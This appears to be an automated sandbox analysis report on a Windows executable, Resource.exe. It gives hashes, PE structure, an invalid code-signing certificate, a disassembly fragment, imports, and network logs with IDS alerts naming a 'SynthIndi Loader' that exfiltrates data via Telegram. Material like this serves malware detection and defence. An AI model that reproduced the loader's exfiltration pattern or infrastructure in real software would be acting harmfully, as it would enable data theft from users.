                                                                                                                                                                                                                                                            Preview:Rar!........!......OA/.=&p%.....aV.."....o. !jk(e.....*F9.e..|0|3.@.)F.KH?.[IZ.h..Jo.@....+E.<....y.Yv+.'.."hC}...._.......U.X...,~..;O...2QnS.r..>...R".1~!D.....H.+....}W.c........u....~&KC0.a._0..,...W........*....E...[.....eu1p.i.:6Sv.......$..38..ABm.k..o/.A.s .....J...!.c...A ..j.$S.m.......9..,.p..K..z..TB./R.$].B.VXn..).+.YCMW.oF..K.U.>EX.b.H3.:zy. ..,.2...\...u..].,......z..kP.1.s.%c....8|X\.|F~..*[]..l.W_../..f.<.C;../.[.E..<.k...t...../..9\|."+.G..-.YF.JW.D.{*.<...c.Iw&S}.x..Y...Y.....(N..t.....|.[...fjd#o'mc...Fl..._......%..2.r....\..N....0..j@..>.......^.^..+^h.24......SYWtz..@...:.~..s<..%...p"F|X..V.C....R...u.....\.8...cs<..h..}"..ja...o./..rT..........m....[rG.*.9ct.n:.M2p7. w.......;((.6jKl..e..U........k.3z.).8..6.5.m..I.G.`..7.;.G..=FS4..?...]..E.`.....\....D.jw.....k.....-.UCO...1GZ..\......S..#....qL..@"..R..3.z.}..2.{.O:!.N...f...6P....e.j...&....8...,..H..b.L.n.,E)F.4.4_..".\6.~.....$..eQ.<..Qa......m.
                                                                                                                                                                                                                                                            Process:C:\Program Files\Windows Defender\MpCmdRun.exe
                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):97
                                                                                                                                                                                                                                                            Entropy (8bit):4.331807756485642
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:3:lyAZFXZDLsFzAXmZrCZDL4QXAVJK4v:lyqBtoJAXmoZDL4CA1v
                                                                                                                                                                                                                                                            MD5:195D02DA13D597A52F848A9B28D871F6
                                                                                                                                                                                                                                                            SHA1:D048766A802C61655B9689E953103236EACCB1C7
                                                                                                                                                                                                                                                            SHA-256:ADE5C28A2B27B13EFB1145173481C1923CAF78648E49205E7F412A2BEFC7716A
                                                                                                                                                                                                                                                            SHA-512:1B9EDA54315B0F8DB8E43EC6E78996464A90E84DE721611647E8395DBE259C282F06FB6384B08933F8F0B452B42E23EE5A7439974ACC5F53DAD64B08D39F4146
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:..Service Version: 0.0.0.0..Engine Version: 0.0.0.0....No engine/signature is currently loaded...
                                                                                                                                                                                                                                                            Process:C:\Windows\System32\PING.EXE
                                                                                                                                                                                                                                                            File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                                                                            Size (bytes):311
                                                                                                                                                                                                                                                            Entropy (8bit):4.7612475217867205
                                                                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                                                                            SSDEEP:6:PzjAcmflvmWxHLTSJALTSJALTSrcsWTo6wGv+wAFeMmvVOIHJFxMVlmJHaVFEG13:Pg/N5pTcgTcgTLs4omvtAFSkIrxMVlmo
                                                                                                                                                                                                                                                            MD5:C28307C869E1E06FBA6ED6A0B5C3ADA5
                                                                                                                                                                                                                                                            SHA1:611CF15C51C331FF11BA5DAD8ACA9DFE466425C4
                                                                                                                                                                                                                                                            SHA-256:AB97D6455B258BCD450C45662AC23458ECF9EB1D7804FD53215514CABCCE035C
                                                                                                                                                                                                                                                            SHA-512:9A5838A2BD7814B27AEF7F293A8A02D1B343F1DED7240880D32887BCE736E5CC37FCA8CE7EB51589BDDDB2614E304BD9BF226BE605232C24D65235D83DA16B0F
                                                                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                                                                            Preview:..Pinging 305090 [::1] with 32 bytes of data:..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ..Reply from ::1: time<1ms ....Ping statistics for ::1:.. Packets: Sent = 3, Received = 3, Lost = 0 (0% loss),..Approximate round trip times in milli-seconds:.. Minimum = 0ms, Maximum = 0ms, Average = 0ms..
                                                                                                                                                                                                                                                            File type:PE32+ executable (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                            Entropy (8bit):7.99311078420396
                                                                                                                                                                                                                                                            TrID:
                                                                                                                                                                                                                                                            • Win64 Executable GUI (202006/5) 92.65%
                                                                                                                                                                                                                                                            • Win64 Executable (generic) (12005/4) 5.51%
                                                                                                                                                                                                                                                            • Generic Win/DOS Executable (2004/3) 0.92%
                                                                                                                                                                                                                                                            • DOS Executable Generic (2002/1) 0.92%
                                                                                                                                                                                                                                                            • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                                                                                                                                                                                                            File name:Resource.exe
                                                                                                                                                                                                                                                            File size:7'714'511 bytes
                                                                                                                                                                                                                                                            MD5:cd56d1639c638ef44a1cbcf6756ef2ba
                                                                                                                                                                                                                                                            SHA1:784970f33b026fe770d8c0f8938d17b26c428327
                                                                                                                                                                                                                                                            SHA256:79041d419f813d07403d5ea0e190c09f63c0e9339bcf225b4588388de34aaa88
                                                                                                                                                                                                                                                            SHA512:c00a3be6d4cbc672b4fe3b4afb5072832a870c99d795656380e23d33e9b7b45f2d0851ba86e1d35fe502af2d001cf13e13ff6d431349dc166cfbdcc54bb19b39
                                                                                                                                                                                                                                                            SSDEEP:196608:qw0cDemLjv+bhqNVoBKUh8mz4Iv9Pmu1D7wJo:SieaL+9qz8/b4IsuRmo
                                                                                                                                                                                                                                                            TLSH:FE763325A3950CE9E82B863DC286C55ADF7336620760D5CB93F893392F039D5D83BB16
                                                                                                                                                                                                                                                            File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......U.Q...?...?...?.Z.<...?.Z.:...?.Z.;...?.......?...:.9.?...;...?...<...?.Z.>...?...>...?.+.;...?.+.=...?.Rich..?................
                                                                                                                                                                                                                                                            Icon Hash:0f134d455561070f
                                                                                                                                                                                                                                                            Entrypoint:0x14000c1f0
                                                                                                                                                                                                                                                            Entrypoint Section:.text
                                                                                                                                                                                                                                                            Digitally signed:true
                                                                                                                                                                                                                                                            Imagebase:0x140000000
                                                                                                                                                                                                                                                            Subsystem:windows gui
                                                                                                                                                                                                                                                            Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
                                                                                                                                                                                                                                                            DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
                                                                                                                                                                                                                                                            Time Stamp:0x659C3416 [Mon Jan 8 17:42:46 2024 UTC]
                                                                                                                                                                                                                                                            TLS Callbacks:
                                                                                                                                                                                                                                                            CLR (.Net) Version:
                                                                                                                                                                                                                                                            OS Version Major:5
                                                                                                                                                                                                                                                            OS Version Minor:2
                                                                                                                                                                                                                                                            File Version Major:5
                                                                                                                                                                                                                                                            File Version Minor:2
                                                                                                                                                                                                                                                            Subsystem Version Major:5
                                                                                                                                                                                                                                                            Subsystem Version Minor:2
                                                                                                                                                                                                                                                            Import Hash:1af6c885af093afc55142c2f1761dbe8
                                                                                                                                                                                                                                                            Signature Valid:false
                                                                                                                                                                                                                                                            Signature Issuer:CN=Sectigo Public Code Signing CA EV R36, O=Sectigo Limited, C=GB
                                                                                                                                                                                                                                                            Signature Validation Error:The digital signature of the object did not verify
                                                                                                                                                                                                                                                            Error Number:-2146869232
                                                                                                                                                                                                                                                            Not Before, Not After
                                                                                                                                                                                                                                                            • 29/09/2021 02:00:00 29/09/2024 01:59:59
                                                                                                                                                                                                                                                            Subject Chain
                                                                                                                                                                                                                                                            • CN=Akeo Consulting, O=Akeo Consulting, S=Donegal, C=IE, OID.2.5.4.15=Private Organization, OID.1.3.6.1.4.1.311.60.2.1.3=IE, SERIALNUMBER=407950
                                                                                                                                                                                                                                                            Version:3
                                                                                                                                                                                                                                                            Thumbprint MD5:5C82B2D08EFE6EE0794B52D4309C5F37
                                                                                                                                                                                                                                                            Thumbprint SHA-1:3DBC3A2A0E9CE8803B422CFDBC60ACD33164965D
                                                                                                                                                                                                                                                            Thumbprint SHA-256:60E992275CC7503A3EBA5D391DB8AEAAAB001402D49AEA3F7F5DA3706DF97327
                                                                                                                                                                                                                                                            Serial:00BFB15001BBF592D4962A7797EA736FA3
                                                                                                                                                                                                                                                            Instruction
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                                            call 00007F1E48AF3A8Ch
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                                                            jmp 00007F1E48AF369Fh
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            sub esp, 28h
                                                                                                                                                                                                                                                            call 00007F1E48AF4004h
                                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                                            je 00007F1E48AF3843h
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            mov eax, dword ptr [00000030h]
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            mov ecx, dword ptr [eax+08h]
                                                                                                                                                                                                                                                            jmp 00007F1E48AF3827h
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            cmp ecx, eax
                                                                                                                                                                                                                                                            je 00007F1E48AF3836h
                                                                                                                                                                                                                                                            xor eax, eax
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            cmpxchg dword ptr [0003427Ch], ecx
                                                                                                                                                                                                                                                            jne 00007F1E48AF3810h
                                                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            add esp, 28h
                                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                                            mov al, 01h
                                                                                                                                                                                                                                                            jmp 00007F1E48AF3819h
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                                                            movzx eax, byte ptr [00034267h]
                                                                                                                                                                                                                                                            test ecx, ecx
                                                                                                                                                                                                                                                            mov ebx, 00000001h
                                                                                                                                                                                                                                                            cmove eax, ebx
                                                                                                                                                                                                                                                            mov byte ptr [00034257h], al
                                                                                                                                                                                                                                                            call 00007F1E48AF3E03h
                                                                                                                                                                                                                                                            call 00007F1E48AF4F22h
                                                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                                                            jne 00007F1E48AF3826h
                                                                                                                                                                                                                                                            xor al, al
                                                                                                                                                                                                                                                            jmp 00007F1E48AF3836h
                                                                                                                                                                                                                                                            call 00007F1E48B01EC1h
                                                                                                                                                                                                                                                            test al, al
                                                                                                                                                                                                                                                            jne 00007F1E48AF382Bh
                                                                                                                                                                                                                                                            xor ecx, ecx
                                                                                                                                                                                                                                                            call 00007F1E48AF4F32h
                                                                                                                                                                                                                                                            jmp 00007F1E48AF380Ch
                                                                                                                                                                                                                                                            mov al, bl
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            add esp, 20h
                                                                                                                                                                                                                                                            pop ebx
                                                                                                                                                                                                                                                            ret
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            int3
                                                                                                                                                                                                                                                            inc eax
                                                                                                                                                                                                                                                            push ebx
                                                                                                                                                                                                                                                            dec eax
                                                                                                                                                                                                                                                            sub esp, 20h
                                                                                                                                                                                                                                                            cmp byte ptr [0003421Ch], 00000000h
                                                                                                                                                                                                                                                            mov ebx, ecx
                                                                                                                                                                                                                                                            jne 00007F1E48AF3889h
                                                                                                                                                                                                                                                            cmp ecx, 01h
                                                                                                                                                                                                                                                            jnbe 00007F1E48AF388Ch
                                                                                                                                                                                                                                                            call 00007F1E48AF3F6Ah
                                                                                                                                                                                                                                                            test eax, eax
                                                                                                                                                                                                                                                            je 00007F1E48AF384Ah
                                                                                                                                                                                                                                                            NameVirtual AddressVirtual Size Is in Section
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IMPORT0x3cdcc0x78.rdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESOURCE0x460000x931c.rsrc
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_EXCEPTION0x420000x22a4.pdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_SECURITY0x7592870x2448
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BASERELOC0x500000x75c.reloc
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DEBUG0x3a3300x1c.rdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x3a1f00x140.rdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_IAT0x2b0000x420.rdata
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                                                                                                                                                                                                            IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                                                                                                                                                                                                            NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                                                                                                                                                                                                            .text0x10000x29c900x29e0062616acf257019688180f494b4eb78d4False0.5523087686567164data6.4831047330596565IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .rdata0x2b0000x12bf40x12c00f1a0eee172d3f361c6916681463cac8bFalse0.5184765625data5.835053788880779IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .data0x3e0000x33380xe0099d84572872f2ce8d9bdbc2521e1966eFalse0.1328125Matlab v4 mat-file (little endian) f\324\377\3772\242\337-\231+, text, rows 4294967295, columns 01.8271683819747706IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                                                                                                                                                                                                            .pdata0x420000x22a40x240039f0a7d8241a665fc55289b5f9977819False0.4720052083333333data5.316391891279308IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            _RDATA0x450000x15c0x200624222957a635749731104f8cdf6f9b7False0.38671875data2.83326547900447IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .rsrc0x460000x931c0x9400b212016c18ddafbb428bf52b4ef92372False0.9474239864864865data7.892798817333006IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            .reloc0x500000x75c0x8004138d4447f190c2657ec208ef31be551False0.5458984375data5.240127521097618IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                                                                                                                                                                                                                            NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                                                                                                                                                                                                            RT_ICON0x462500x315PNG image data, 16 x 16, 8-bit/color RGBA, non-interlaced1.0139416983523448
                                                                                                                                                                                                                                                            RT_ICON0x465680x57bPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0078403421240199
                                                                                                                                                                                                                                                            RT_ICON0x46ae40x80bPNG image data, 32 x 32, 8-bit/color RGBA, non-interlaced1.0053423992229238
                                                                                                                                                                                                                                                            RT_ICON0x472f00xd10PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0032894736842106
                                                                                                                                                                                                                                                            RT_ICON0x480000x1251PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced1.002345915973555
                                                                                                                                                                                                                                                            RT_ICON0x492540x27f7PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced0.9981428990323526
                                                                                                                                                                                                                                                            RT_ICON0x4ba4c0x2fdcPNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced0.9893078681031668
                                                                                                                                                                                                                                                            RT_GROUP_ICON0x4ea280x68data0.75
                                                                                                                                                                                                                                                            RT_VERSION0x4ea900x37cdata0.47533632286995514
                                                                                                                                                                                                                                                            RT_MANIFEST0x4ee0c0x50dXML 1.0 document, ASCII text0.4694508894044857
                                                                                                                                                                                                                                                            DLLImport
                                                                                                                                                                                                                                                            USER32.dllCreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
                                                                                                                                                                                                                                                            COMCTL32.dll
                                                                                                                                                                                                                                                            KERNEL32.dllIsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, CreateSymbolicLinkW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
                                                                                                                                                                                                                                                            ADVAPI32.dllOpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
                                                                                                                                                                                                                                                            GDI32.dllSelectObject, DeleteObject, CreateFontIndirectW
                                                                                                                                                                                                                                                            TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                                                                                                                                                                                                            2025-01-06T16:18:39.056741+01001810008Joe Security ANOMALY Telegram Send File1192.168.2.549853149.154.167.220443TCP
                                                                                                                                                                                                                                                            2025-01-06T16:18:39.056871+01002857751ETPRO MALWARE SynthIndi Loader Exfiltration Activity (POST)1192.168.2.549853149.154.167.220443TCP
                                                                                                                                                                                                                                                            2025-01-06T16:18:40.033280+01002857752ETPRO MALWARE SynthIndi Loader CnC Response1149.154.167.220443192.168.2.549853TCP
                                                                                                                                                                                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.311427116 CET4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.316190958 CET8049709208.95.112.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.318157911 CET4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.318236113 CET4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.322983980 CET8049709208.95.112.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.807560921 CET8049709208.95.112.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.812340021 CET4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.817341089 CET8049709208.95.112.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:17:59.817400932 CET4970980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:37.501811981 CET4984980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:37.506618023 CET8049849208.95.112.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:37.506699085 CET4984980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:37.506776094 CET4984980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:37.511518002 CET8049849208.95.112.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.155705929 CET8049849208.95.112.1192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.205959082 CET4984980192.168.2.5208.95.112.1
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.409876108 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.409921885 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.409987926 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.439152002 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:38.439173937 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.051090002 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.052891970 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.052906036 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.054256916 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.054312944 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.056173086 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.056241035 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.056468010 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.056474924 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.056550026 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.056574106 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.056674004 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.056704044 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.056794882 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.056822062 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057009935 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057025909 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057050943 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057061911 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057229042 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057235956 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057257891 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057265043 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057275057 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057285070 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057301044 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057307959 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057326078 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057337046 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057387114 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057395935 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057410955 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057416916 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057432890 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057439089 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057454109 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057471037 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057480097 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057487011 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057492971 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057497025 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057513952 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057518005 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057531118 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057538033 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057548046 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057554007 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057574034 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057579041 CET44349853149.154.167.220192.168.2.5
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057593107 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057600975 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057606936 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057642937 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057662964 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057677031 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057722092 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057743073 CET49853443192.168.2.5149.154.167.220
                                                                                                                                                                                                                                                            Jan 6, 2025 16:18:39.057749987 CET49853443192.168.2.5149.154.167.220
